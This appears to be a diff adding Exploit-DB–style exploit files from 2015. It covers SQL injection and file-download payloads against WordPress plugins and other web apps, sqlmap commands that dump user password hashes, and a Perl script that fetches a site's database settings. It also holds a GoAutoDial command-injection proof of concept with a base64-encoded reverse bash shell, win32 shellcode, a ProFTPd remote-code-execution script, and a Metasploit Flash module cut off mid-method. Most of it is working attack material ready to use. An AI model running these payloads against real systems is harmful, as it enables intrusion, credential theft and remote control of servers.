||||
# Version :1.0.5
|
||||
# Tested on :Win7/Chrome/Firefox
|
||||
# Exploit Author :Necmettin COSKUN =>@babayarisi
|
||||
# Discovery date :04/15/2015
|
||||
|
||||
|
||||
MiwoFTP is a file manager plugin for Wordpress.
|
||||
|
||||
|
||||
Description
|
||||
================
|
||||
Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability.
|
||||
|
||||
Poc Exploit
|
||||
================
|
||||
http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
|
||||
|
||||
================
|
||||
#RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic
|
||||
|
||||
#http://www.exploit-db.com/exploits/36763/
|
||||
#http://www.exploit-db.com/exploits/36762/
|
||||
#http://www.exploit-db.com/exploits/36761/
|
||||
================
|
||||
|
||||
Discovered by:
|
||||
================
|
||||
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!
|
88
platforms/php/webapps/36800.txt
Executable file
88
platforms/php/webapps/36800.txt
Executable file
|
@ -0,0 +1,88 @@
|
|||
######################
|
||||
|
||||
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
|
||||
|
||||
# Exploit Author : Claudio Viviani
|
||||
|
||||
# Website Author: http://www.homelab.it
|
||||
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
|
||||
|
||||
|
||||
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
|
||||
|
||||
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
|
||||
|
||||
# Dork Google: inurl:nex-forms-express-wp-form-builder
|
||||
# index of nex-forms-express-wp-form-builder
|
||||
|
||||
# Date : 2015-03-29
|
||||
|
||||
# Tested on : Windows 7 / Mozilla Firefox
|
||||
# Linux / Mozilla Firefox
|
||||
|
||||
######################
|
||||
|
||||
# Info:
|
||||
|
||||
The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
|
||||
|
||||
"nex_forms_Id" var is not sanitized
|
||||
|
||||
# PoC Exploit:
|
||||
|
||||
http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
|
||||
|
||||
# Poc Video:
|
||||
|
||||
http://youtu.be/04G08Cbrx1I
|
||||
|
||||
# PoC sqlmap:
|
||||
|
||||
sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
|
||||
|
||||
[23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
|
||||
[23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
|
||||
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
|
||||
[23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
|
||||
[23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
|
||||
[23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
|
||||
[23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
|
||||
GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
|
||||
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
|
||||
---
|
||||
Parameter: nex_forms_Id (GET)
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
|
||||
Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
|
||||
---
|
||||
[23:16:34] [INFO] the back-end DBMS is MySQL
|
||||
web server operating system: Linux CentOS 5.10
|
||||
web application technology: PHP 5.3.3, Apache 2.2.3
|
||||
back-end DBMS: MySQL 5.0.12
|
||||
|
||||
######################
|
||||
|
||||
# Vulnerability Disclosure Timeline:
|
||||
|
||||
2015-03-29: Discovered vulnerability
|
||||
2015-04-16: Vendor Notification
|
||||
2015-04-17: Vendor Response/Feedback
|
||||
2015-04-21: Vendor Send Fix/Patch (same version number)
|
||||
2015-04-21: Public Disclosure
|
||||
|
||||
#####################
|
||||
|
||||
Discovered By : Claudio Viviani
|
||||
http://www.homelab.it
|
||||
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
|
||||
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
|
||||
|
||||
info@homelab.it
|
||||
homelabit@protonmail.ch
|
||||
|
||||
https://www.facebook.com/homelabit
|
||||
https://twitter.com/homelabit
|
||||
https://plus.google.com/+HomelabIt1/
|
||||
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
|
||||
|
||||
#####################
|
47
platforms/php/webapps/36801.txt
Executable file
47
platforms/php/webapps/36801.txt
Executable file
|
@ -0,0 +1,47 @@
|
|||
######################
|
||||
|
||||
# Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download
|
||||
|
||||
# Exploit Author : Dadou Dz
|
||||
|
||||
# Software Link : Premium
|
||||
|
||||
# Dork Google: inurl:com_miwoftp
|
||||
|
||||
# Affected version: 1.0.5
|
||||
|
||||
# Vendor Homepage:
|
||||
http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
|
||||
|
||||
|
||||
# Date : 2015-04-20
|
||||
|
||||
# Tested on : Windows 7 / Mozilla Firefox
|
||||
# Linux / Mozilla Firefox
|
||||
######################
|
||||
|
||||
# Exploit:
|
||||
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
|
||||
"download_file" : wp-config.php
|
||||
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
|
||||
|
||||
|
||||
|
||||
#####################
|
||||
|
||||
Discovered By : Dadou Dz
|
||||
My Email - dadoudzdz@gmail.com
|
||||
fb: fb.com/Dz2Team
|
||||
[ Thanks To ]
|
||||
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi
|
||||
|
||||
Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team
|
||||
|
||||
AnonGhost Team - Anonymous Dz - Backup Sec Dz
|
||||
|
||||
Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
|
||||
dz-root.com
|
||||
|
||||
And All My Freinds - All Muslims Hackers - All Algerian Hackers
|
||||
|
||||
#####################
|
72
platforms/php/webapps/36802.txt
Executable file
72
platforms/php/webapps/36802.txt
Executable file
|
@ -0,0 +1,72 @@
|
|||
=======================================================================
|
||||
title: SQL Injection
|
||||
product: WordPress Tune Library Plugin
|
||||
vulnerable version: 1.5.4 (and probably below)
|
||||
fixed version: 1.5.5
|
||||
CVE number: CVE-2015-3314
|
||||
impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
|
||||
homepage: https://wordpress.org/plugins/tune-library/
|
||||
found: 2015-01-09
|
||||
by: Hannes Trunde
|
||||
|
||||
mail: hannes.trunde@gmail.com
|
||||
twitter: @hannestrunde
|
||||
|
||||
=======================================================================
|
||||
|
||||
|
||||
Plugin description:
|
||||
-------------------
|
||||
"This plugin is used to import an XML iTunes Music Library file into your
|
||||
WordPress database. Once imported, you can display a complete listing of your
|
||||
music collection on a page of your WordPress site."
|
||||
|
||||
Source: https://wordpress.org/plugins/tune-library/
|
||||
|
||||
|
||||
Recommendation:
|
||||
---------------
|
||||
The author has provided a fixed plugin version which should be installed
|
||||
immediately.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
Because of insufficient input validation, a sql injection attack can be
|
||||
performed when sorting artists by letter.
|
||||
|
||||
However, special conditions must be met in order to exploit this vulnerability:
|
||||
1) The wordpress security feature wp_magic_quotes(), which is enabled by
|
||||
default, has to be disabled.
|
||||
2) The plugin specific option "Filter artists by letter and show alphabetical
|
||||
navigation" has to be enabled.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
The following HTTP request to the Tune Library page returns version, current
|
||||
user and db name:
|
||||
===============================================================================
|
||||
http://www.site.com/?page_id=2&artistletter=G' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
|
||||
===============================================================================
|
||||
|
||||
|
||||
Contact timeline:
|
||||
------------------------
|
||||
2015-04-08: Contacting author via mail.
|
||||
2015-04-09: Author replies and announces a fix within a week.
|
||||
2015-04-12: Mail from author, stating that plugin has been updated.
|
||||
2015-04-14: Requesting CVE via post to the open source software security mailing
|
||||
list: http://openwall.com/lists/oss-security/2015/04/14/5
|
||||
2015-04-20: Release of security advisory.
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
Update to the most recent plugin version.
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by
|
||||
letter..." option.
|
110
platforms/php/webapps/36804.pl
Executable file
110
platforms/php/webapps/36804.pl
Executable file
|
@ -0,0 +1,110 @@
|
|||
.__ _____ _______
|
||||
| |__ / | |___ __\ _ \_______ ____
|
||||
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
|
||||
| \/ ^ /> <\ \_/ \ | \/\ ___/
|
||||
|___| /\____ |/__/\_ \\_____ /__| \___ >
|
||||
\/ |__| \/ \/ \/
|
||||
_____________________________
|
||||
/ _____/\_ _____/\_ ___ \
|
||||
\_____ \ | __)_ / \ \/ http://twitter.com/h4SEC
|
||||
/ \ | \\ \____ Proof Video: https://www.youtube.com/watch?v=7yxbfD1YK8Y
|
||||
/_______ //_______ / \______ /
|
||||
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
[+] Author : KnocKout
|
||||
[~] E-Mail : knockout@e-mail.com.tr
|
||||
[~] Twitter: http://twitter.com/h4SEC
|
||||
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org - http://www.fiXen.org
|
||||
[~] Greetz: ZoRLu, DaiMon, VolqaN, DaiMon, KedAns-Dz , Septemb0x, BARCOD3, b3mb4m, SysToxic, EthicalHacker and all TurkSec Group members.
|
||||
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|~Web App. : MediaSuite CMS - Artibary File Disclosure Exploit
|
||||
|~Price : N/A
|
||||
|~Version : All CMS
|
||||
|~Software: http://www.mediasuite.ca
|
||||
|~Vulnerability Style : File Disclosure
|
||||
|~Vulnerability Dir : /
|
||||
|~Google Dork : "MediaSuite.ca - Website Design, Media Marketing Suite - Barrie Ontario"
|
||||
|[~]Date : "20.04.2015"
|
||||
|[~]Exploit Tested on : >>>> www.mediasuite.ca ( Official Web ) <<<<<
|
||||
----------------------------------------------------------
|
||||
---------------------Info;--------------------------------
|
||||
----------------------------------------------------------
|
||||
can be easily found in any database password for this "site-settings.php" will be sufficient to read
|
||||
possible to read the file on the local database.
|
||||
incorrect coding and unconscious in it causing ""force-download.php"" file.
|
||||
that's laughter reason codes:)
|
||||
|
||||
##################################################################################################
|
||||
file in "force-download.php"
|
||||
..
|
||||
..
|
||||
..
|
||||
$type = $_GET['type'];
|
||||
$file = $_GET['file'];
|
||||
|
||||
if($type == "1"){
|
||||
$filename = "../uploads/$file";
|
||||
}
|
||||
..
|
||||
..
|
||||
..
|
||||
}
|
||||
header("Pragma: public"); // required
|
||||
header("Expires: 0");
|
||||
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
|
||||
header("Cache-Control: private",false); // required for certain browsers
|
||||
header("Content-Type: $ctype");
|
||||
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
|
||||
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
|
||||
header("Content-Transfer-Encoding: binary");
|
||||
header("Content-Length: ".filesize($filename));
|
||||
readfile("$filename");
|
||||
exit();
|
||||
..
|
||||
...
|
||||
|
||||
##################################################################################################
|
||||
##############################Exploit.pl#########################################################
|
||||
##################################################################################################
|
||||
|
||||
use LWP::Simple;
|
||||
use LWP::UserAgent;
|
||||
system('cls');
|
||||
system('title MediaSuite CMS - Artibary File Disclosure Exploit');
|
||||
system('color 2');
|
||||
if(@ARGV < 2)
|
||||
{
|
||||
print "[-]Su Sekilde Kocum. \n\n";
|
||||
&help; exit();
|
||||
}
|
||||
sub help()
|
||||
{
|
||||
print "[+] Usaqe : perl $0 Target /path/ \n";
|
||||
print "[+] Usage : perl $0 localhost / \n";
|
||||
}
|
||||
print "\n************************************************************************\n";
|
||||
print "\* MediaSuite CMS - Artibary File Disclosure Exploit *\n";
|
||||
print "\* Exploit coded by : KnocKout *\n";
|
||||
print "\* Contact : twitter.com/h4SEC *\n";
|
||||
print "\* -- *\n";
|
||||
print "\*********************************************************************\n\n\n";
|
||||
($TargetIP, $path, $File,) = @ARGV;
|
||||
$File="includes/force-download.php?type=1&file=../includes/site-settings.php";
|
||||
my $url = "http://" . $TargetIP . $path . $File;
|
||||
print "\n Biraz Bekle. \n\n";
|
||||
my $useragent = LWP::UserAgent->new();
|
||||
my $request = $useragent->get($url,":content_file" => "site-settings.php");
|
||||
if ($request->is_success)
|
||||
{
|
||||
print "[+] Exploit Basarili, kodlayanin eline saglik \n\n";
|
||||
print "[+] Exploit Basarili. !\n";
|
||||
print "[+] Database bilgilerinin yer aldigi (site-settings.php) dosyasi indirildi. \n";
|
||||
print "[+] h4 SEC \n";
|
||||
print "[+] Special tnX : ZoRLu, _UnDeRTaKeR, DaiMon, VoLqaN, BARCOD3, Septemb0x, EthicalHacker
|
||||
\n";
|
||||
exit();
|
||||
}
|
||||
else
|
||||
{
|
||||
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
|
||||
exit();
|
||||
}
|
80
platforms/php/webapps/36805.txt
Executable file
80
platforms/php/webapps/36805.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
=======================================================================
|
||||
title: SQL Injection
|
||||
product: WordPress Community Events Plugin
|
||||
vulnerable version: 1.3.5 (and probably below)
|
||||
fixed version: 1.4
|
||||
CVE number: CVE-2015-3313
|
||||
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
|
||||
homepage: https://wordpress.org/plugins/community-events/
|
||||
found: 2015-01-07
|
||||
by: Hannes Trunde
|
||||
|
||||
mail: hannes.trunde@gmail.com
|
||||
twitter: @hannestrunde
|
||||
|
||||
=======================================================================
|
||||
|
||||
|
||||
Plugin description:
|
||||
-------------------
|
||||
"The purpose of this plugin is to allow users to create a schedule of upcoming
|
||||
events and display events for the next 7 days in an AJAX-driven box or
|
||||
displaying a full list of upcoming events."
|
||||
|
||||
Source: https://wordpress.org/plugins/community-events/
|
||||
|
||||
|
||||
Recommendation:
|
||||
---------------
|
||||
The author has provided a fixed plugin version which should be installed
|
||||
immediately.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
Because of insufficient input validation, a blind SQL injection attack can be
|
||||
performed within the search function to obtain sensitive information from the
|
||||
database. To exploit this vulnerability, there has to be at least one planned
|
||||
event on the calendar.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
The following HTTP request to the Community Events full schedule returns the
|
||||
event(s) planned in the specified year:
|
||||
===============================================================================
|
||||
http://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1
|
||||
===============================================================================
|
||||
|
||||
The following HTTP request returns a blank page, thus confirming the blind SQL
|
||||
injection vulnerability:
|
||||
===============================================================================
|
||||
http://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1
|
||||
===============================================================================
|
||||
|
||||
Obtaining users and password hashes with sqlmap may look as follows (--string
|
||||
parameter has to contain (part of) the name of the event, enabling sqlmap to
|
||||
differentiate between true and false statements):
|
||||
================================================================================
|
||||
sqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"
|
||||
================================================================================
|
||||
|
||||
|
||||
Contact timeline:
|
||||
-----------------
|
||||
2015-04-08: Contacting author via mail.
|
||||
2015-04-09: Author replies and announces a fix within a week.
|
||||
2015-04-12: Mail from author, stating that plugin has been updated.
|
||||
2015-04-14: Posting information to the open source software security mailing
|
||||
list: http://openwall.com/lists/oss-security/2015/04/14/5
|
||||
2015-04-18: Release of security advisory.
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
Update to the most recent plugin version.
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
See solution.
|
73
platforms/php/webapps/36807.txt
Executable file
73
platforms/php/webapps/36807.txt
Executable file
|
@ -0,0 +1,73 @@
|
|||
Affected software: GoAutoDial
|
||||
Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
|
||||
Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
|
||||
Vendor advisory: http://goautodial.org/news/21
|
||||
|
||||
Abstract:
|
||||
Multiple vulnerabilties exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.
|
||||
|
||||
Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
|
||||
Refer to the product changelog.txt: https://github.com/goautodial/ce-www/blob/master/changelog.txt
|
||||
|
||||
==================================
|
||||
1/ CVE-2015-2843
|
||||
- SQLi authentication bypass due to lack of input sanitisation
|
||||
Affected file: go_login.php
|
||||
Issue: Lack of input sanitisation on input parameters user_name and user_pass prior to being handled by the database.
|
||||
|
||||
A simple 'OR '1'='1 in the password field with a username of 'admin' will log you in. (assuming the default administrator user has not been removed).
|
||||
You can also test this by performing the following GET request:
|
||||
|
||||
PoC:
|
||||
https://<ip>/go_login/validate_credentials/admin/' OR '1'='1
|
||||
|
||||
- SQLi within the 'go_get_user_info' function
|
||||
Affected file: go_site.php
|
||||
Issue: Lack of input sanitisation on input parameters being handled by the database
|
||||
|
||||
This function returns a single entry from the db that contains user information including the username and password.
|
||||
Given that the first 'active' user in the db would most likely be the admin user you can search for active=Y. There is a column in the vicidial_users table that identifies whether a user is active (Y) or not active (N).
|
||||
Given this, you can perform the following to return an admin user's account username and password.
|
||||
|
||||
PoC:
|
||||
https://<ip>/index.php/go_site/go_get_user_info/' or active='Y
|
||||
|
||||
==================================
|
||||
2/ CVE-2015-2842
|
||||
- Arbitrary file upload within the 'audiostore' upload functionality
|
||||
Affected file: go_audiostore.php
|
||||
Issue: Filename extensions are not properly checked to ensure only 'audio' files can be uploaded
|
||||
|
||||
A user can upload a file with the filename 'bogus.wav.php'. The filename is checked for the '.wav' extension and the check is passed, however with the trailing '.php' file extension, much fun is obtained.
|
||||
An uploaded file is moved to a symlinked directory (/var/lib/asterisk/sounds) of which can be viewed directly from the browser.
|
||||
Note*: All user uploaded files are given the 'go_' prefix. This example ends up with 'go_bogus.wav.php' as an uploaded file.
|
||||
|
||||
https://<ip>/sounds/go_bogus.wav.php
|
||||
** Pop goes the shell **
|
||||
|
||||
==================================
|
||||
3/ CVE-2015-2844 and CVE-2015-2845
|
||||
- Arbitrary command injection via the cpanel function due to lack of input sanitisation
|
||||
Affected file: go_site.php
|
||||
Issue: User supplied parameters are passed to the php 'exec' function, of which the intended function can be escaped to do more sinister things.
|
||||
|
||||
Two variables are passed to the underlying exec command, $action and $type. Either one can be used.
|
||||
URI looks like this: https://<ip>/index.php/go_site/cpanel/$type/$action
|
||||
|
||||
Affected code: exec("/usr/share/goautodial/goautodialc.pl '/sbin/service $type ".strtolower($action)."'");
|
||||
|
||||
Base64 encoding bypasses any web server encoding and a lovely root shell is obtained.
|
||||
** pop goes a root shell **
|
||||
reverse bash shell one liner: bash -i >& /dev/tcp/192.168.0.11/4444 0>&1
|
||||
|
||||
PoC:
|
||||
https://<ip>/index.php/go_site/cpanel/|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"
|
||||
|
||||
==================================
|
||||
Vulnerability Remediation
|
||||
|
||||
Upgrade to version 3.3-1421902800 at a minimum.
|
||||
As per the vendor advisory, follow the instructions provided in the link below.
|
||||
http://goautodial.org/projects/goautodialce/wiki/GIThub
|
||||
|
||||
Metasploit module to be created at some point though quick and dirty python scripts work just fine too...
|
50
platforms/win32/shellcode/36779.c
Executable file
50
platforms/win32/shellcode/36779.c
Executable file
|
@ -0,0 +1,50 @@
|
|||
/*
|
||||
#[+] Author: TUNISIAN CYBER
|
||||
#[+] Title: Shellcode: win32/xp sp3 Create ("file.txt") (83 bytes)
|
||||
#[+] Date: 15-04-2015
|
||||
#[+] Type: Local Exploits
|
||||
#[+] Tested on: WinXp 32bit SP3
|
||||
#[+] Friendly Sites: sec4ever.com
|
||||
#[+] Twitter: @TCYB3R
|
||||
#[+] Credits: steve hanna
|
||||
projectshellcode.com
|
||||
=============================
|
||||
Assembly:
|
||||
|
||||
;create.asm
|
||||
[Section .text]
|
||||
|
||||
BITS 32
|
||||
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
||||
jmp short GetCommand
|
||||
CommandReturn:
|
||||
pop ebx
|
||||
|
||||
xor eax,eax
|
||||
push eax
|
||||
push ebx
|
||||
mov ebx,0x7c8623ad
|
||||
call ebx
|
||||
|
||||
xor eax,eax
|
||||
push eax
|
||||
mov ebx, 0x7c81cafa
|
||||
call ebx
|
||||
|
||||
GetCommand:
|
||||
call CommandReturn
|
||||
db "cmd.exe /C echo shellcode by tunisian cyber >file.txt"
|
||||
db 0x00
|
||||
=============================
|
||||
*/
|
||||
char shellcode[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff"
|
||||
"\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
|
||||
"\x65\x20\x2f\x43\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20\x62\x79"
|
||||
"\x20\x74\x75\x6e\x69\x73\x69\x61\x6e\x20\x63\x79\x62\x65\x72\x20\x3e\x66\x69\x6c\x65\x2e\x74\x78\x74\x00";
|
||||
|
||||
|
||||
int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}
|
50
platforms/win32/shellcode/36780.c
Executable file
50
platforms/win32/shellcode/36780.c
Executable file
|
@ -0,0 +1,50 @@
|
|||
/*
|
||||
#[+] Author: TUNISIAN CYBER
|
||||
#[+] Title: Shellcode: win32/xp sp3 Restart computer
|
||||
#[+] Date: 16-04-2015
|
||||
#[+] Type: Local Exploits
|
||||
#[+] Tested on: WinXp 32bit SP3
|
||||
#[+] Friendly Sites: sec4ever.com
|
||||
#[+] Twitter: @TCYB3R
|
||||
#[+] Credits: steve hanna
|
||||
projectshellcode.com
|
||||
=============================
|
||||
Assembly:
|
||||
|
||||
;create.asm
|
||||
[Section .text]
|
||||
|
||||
BITS 32
|
||||
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
||||
jmp short GetCommand
|
||||
CommandReturn:
|
||||
pop ebx
|
||||
|
||||
xor eax,eax
|
||||
push eax
|
||||
push ebx
|
||||
mov ebx,0x7c8623ad
|
||||
call ebx
|
||||
|
||||
xor eax,eax
|
||||
push eax
|
||||
mov ebx, 0x7c81cafa
|
||||
call ebx
|
||||
|
||||
GetCommand:
|
||||
call CommandReturn
|
||||
db "cmd.exe /C shutdown /r /t 0"
|
||||
db 0x00
|
||||
=============================
|
||||
*/
|
||||
char shellcode[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
|
||||
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x43\x20"
|
||||
"\x73\x68\x75\x74\x64\x6f\x77\x6e\x20\x2f\x72\x20\x2f\x74\x20\x30\x00";
|
||||
|
||||
|
||||
|
||||
int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}
|
47
platforms/windows/remote/36803.py
Executable file
47
platforms/windows/remote/36803.py
Executable file
|
@ -0,0 +1,47 @@
|
|||
# Title: ProFTPd 1.3.5 Remote Command Execution
|
||||
# Date : 20/04/2015
|
||||
# Author: R-73eN
|
||||
# Software: ProFTPd 1.3.5 with mod_copy
|
||||
# Tested : Kali Linux 1.06
|
||||
# CVE : 2015-3306
|
||||
# Greetz to Vadim Melihow for all the hard work .
|
||||
import socket
|
||||
import sys
|
||||
import requests
|
||||
#Banner
|
||||
banner = ""
|
||||
banner += " ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
if(len(sys.argv) < 4):
|
||||
print '\n Usage : exploit.py server directory cmd'
|
||||
else:
|
||||
server = sys.argv[1] #Vulnerable Server
|
||||
directory = sys.argv[2] # Path accessible from web .....
|
||||
cmd = sys.argv[3] #PHP payload to be executed
|
||||
evil = '<?php system("' + cmd + '") ?>'
|
||||
s.connect((server, 21))
|
||||
s.recv(1024)
|
||||
print '[ + ] Connected to server [ + ] \n'
|
||||
s.send('site cpfr /etc/passwd')
|
||||
s.recv(1024)
|
||||
s.send('site cpto ' + evil)
|
||||
s.recv(1024)
|
||||
s.send('site cpfr /proc/self/fd/3')
|
||||
s.recv(1024)
|
||||
s.send('site cpto ' + directory + 'infogen.php')
|
||||
s.recv(1024)
|
||||
s.close()
|
||||
print '[ + ] Payload sended [ + ]\n'
|
||||
print '[ + ] Executing Payload [ + ]\n'
|
||||
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
|
||||
if (r.status_code == 200):
|
||||
print '[ * ] Payload Executed Succesfully [ * ]'
|
||||
else:
|
||||
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
|
||||
|
||||
print '\n http://infogen.al/'
|
110
platforms/windows/remote/36808.rb
Executable file
110
platforms/windows/remote/36808.rb
Executable file
|
@ -0,0 +1,110 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs
|
||||
in the copyPixelsToByteArray method from the BitmapData object. The position field of the
|
||||
destination ByteArray can be used to cause an integer overflow and write contents out of
|
||||
the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit),
|
||||
IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Chris Evans', # Vulnerability discovery and 64 bit analysis / exploit
|
||||
'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket
|
||||
'hdarwin', # @hdarwin89, 32 bit public exploit, this msf module uses it
|
||||
'juan vazquez' # msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-0556'],
|
||||
['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'],
|
||||
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'],
|
||||
['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'],
|
||||
['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'],
|
||||
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:os_name => OperatingSystems::Match::WINDOWS_7,
|
||||
:ua_name => Msf::HttpClients::IE,
|
||||
:flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') },
|
||||
:arch => ARCH_X86
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Sep 23 2014',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
@swf = create_swf
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
print_status("Request: #{request.uri}")
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
